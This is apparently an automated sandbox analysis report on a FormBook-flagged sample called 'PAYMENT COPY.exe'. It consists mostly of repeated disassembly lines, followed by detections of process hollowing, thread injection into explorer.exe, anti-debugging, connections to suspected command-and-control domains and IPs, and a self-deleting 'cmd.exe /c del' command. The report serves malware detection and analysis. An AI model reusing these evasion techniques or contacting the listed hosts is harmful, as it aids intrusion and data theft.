          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D88DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D13D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D53540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D83D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D5A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D18EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D8FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D08E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D8FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D92073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D02990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D02ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D02AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D64257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D8B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.sportfest40.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.244.230.236 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.kakavjesajt.com
          Source: C:\Windows\explorer.exeDomain query: www.nescleanups.com
          Source: C:\Windows\explorer.exeDomain query: www.llmav.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 23.225.41.92 80
          Source: C:\Windows\explorer.exeNetwork Connect: 52.79.124.173 80
          Source: C:\Windows\explorer.exeDomain query: www.stripepayment.online
          Source: C:\Windows\explorer.exeNetwork Connect: 176.104.107.18 80
          Source: C:\Windows\explorer.exeDomain query: www.beyoncos.com
          Source: C:\Windows\explorer.exeDomain query: www.35efb510815e.com
          Source: C:\Windows\explorer.exeNetwork Connect: 167.114.6.31 80
          Source: C:\Windows\explorer.exeDomain query: www.360caiyin.com
          Source: C:\Windows\explorer.exeDomain query: www.mg-izkerr8.net
          Source: C:\Windows\explorer.exeNetwork Connect: 14.129.120.32 80
          Source: C:\Windows\explorer.exeDomain query: www.cursosdigitaisbr.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.28.135 80
          Source: C:\Windows\explorer.exeDomain query: www.cjaccessories.net
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_709B1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: unknown target: C:\Users\user\Desktop\PAYMENT COPY.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: FF0000
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess created: C:\Users\user\Desktop\PAYMENT COPY.exe 'C:\Users\user\Desktop\PAYMENT COPY.exe'
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PAYMENT COPY.exe'
          Source: explorer.exe, 00000004.00000002.594810965.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.594985582.0000000003560000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.594810965.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.594985582.0000000003560000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.594810965.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.594985582.0000000003560000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000004.00000002.594810965.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.594985582.0000000003560000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
